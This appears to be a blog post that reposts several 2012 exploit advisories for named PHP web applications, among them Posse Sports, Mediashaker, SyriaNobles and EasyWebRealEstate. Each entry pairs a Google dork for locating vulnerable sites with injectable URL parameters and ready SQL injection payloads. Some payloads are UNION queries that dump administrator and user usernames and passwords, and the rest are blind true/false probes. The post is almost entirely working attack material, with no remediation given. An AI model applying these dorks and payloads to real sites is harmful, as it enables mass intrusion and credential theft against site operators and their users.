Posse Softball Director CMS Blind SQL Injection Vulnerability
[+] Autor: easy laster
[+] Vulnerabilities [Blind SQL Injection ]
[+] Page: www.possesports.com
[+] Language: [ PHP ]
[+] Version: 1.0
[+] Date: 04.01.2012
[+] Status:vulnerable
http://[host]/[path]/team.php?idteam= [SQL Injection}
PAYLOAD TRUE : and+1=1--+
PAYLOAD FALSE : and+1=2--+
Biz Technologies SQL Injection Vulnerability
# Google Dork: inurl:gallery.php "Powered by Biz Technologies"
# Date: 4/1/2012
# Author: H4ckCity Security Team
# Discovered By: farbodmahini
# Home: WwW.H4ckCity.Org
# Software Link: www.biztechnepal.com
# Version: All Version
# Category: webapps
# Security Risk:: High
# Tested on: GNU/Linux Ubuntu - Windows Server - win7
Vulnerable link : http://[target]//gallery.php?id=[SQL]
PAYLOAD : -9999+union+select+group_concat(adminid,0x3a,username,0x3a,password)+from+admin--
Mediashaker Blind SQL Injection Vulnerability
# Google Dork: inurl:content.php "Powered by Mediashaker"
# Date: 4/1/2012
# Author: H4ckCity Security Team
# Discovered By: farbodmahini
# Home: WwW.H4ckCity.Org
# Version: All Version
# Category:: webapps
# Security Risk:: High
# Vendor: http://www.mediashaker.com/
# Tested on: GNU/Linux Ubuntu - Windows Server - win7
Vulnerable link : http://www.target.com/content.php?id=1 [Blind SQL]
PAYLOAD FALSE : and substring(@@version,1,1)=5--
PATLOAD TRUE : and substring(@@version,1,1)=4--
Posse Sports SQL Injection Vulnerability
# Google Dork: "Powered By Posse Sports"
# Date: 4/1/2012
# Author: H4ckCity Security Team
# Discovered By: farbodmahini
# Home: WwW.H4ckCity.Org
# Software Link: www.possesports.com
# Version: All Version
# Category:: webapps
# Security Risk:: High
# Tested on: GNU/Linux Ubuntu - Windows Server - win7
Vulnerable link:
# http://[target]/newsdetail.php?news_id=[SQL]
# http://[target]/dirdetails.php?iddirector=[SQL]
# http://[target]/tdetails.php?idtourn=[SQL]
# http://[target]/tresults.php?tourn_id=[SQL]
# http://[target]/tournsearch.php?idclass=[SQL]
# http://[target]/fieldinfo.php?idfield=[SQL]
# http://[target]/page.php?id=[SQL*]
PAYLOAD : -9999+union+select+1,2,group_concat(id,0x3a,username,0x3a,password)+from+user
SyriaNobles SQL Injection Vulnerability
# Google Dork: inurl:view-page.php "Powered by SyriaNobles"
# Date: 4/1/2012
# Author: H4ckCity Security Team
# Discovered By: farbodmahini
# Home: WwW.H4ckCity.Org
# Version: All Version
# Category:: webapps
# Security Risk:: High
# Vendor: http://www.syrianobles.com/syrianobles/english/
# Tested on: GNU/Linux Ubuntu - Windows Server - win7
Vulnerable link : http://[target]/page.php?id=[SQL]
PAYLOAD : -1+union+select+1,2,group_concat(id,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11+from+user
EasyWebRealEstate Blind SQL Injection Vulnerability
# Google Dork: inurl:listings.php "Powered by EasyWebRealEstate"
# Date: 4/1/2012
# Author: H4ckCity Security Team
# Discovered By: farbodmahini
# Home: WwW.H4ckCity.Org
# Software Link: www.easywebrealestate.com
# Version: All Version
# Category:: webapps
# Security Risk:: High
# Tested on: GNU/Linux Ubuntu - Windows Server - win7
Vulnerable link :
# http://[target]/[patch]/listings.php?lstid=1 [Blind SQL]
# http://[target]/[patch]/index.php?current=tip&infoid=9' [Blind SQL]
PAYLOAD TRUE : http://[target]/[patch]/listings.php?lstid=1 and 1=1
PAYLOAD FALSE : http://[target]/[patch]/listings.php?lstid=1 and 1=0
0 comment:
Post a Comment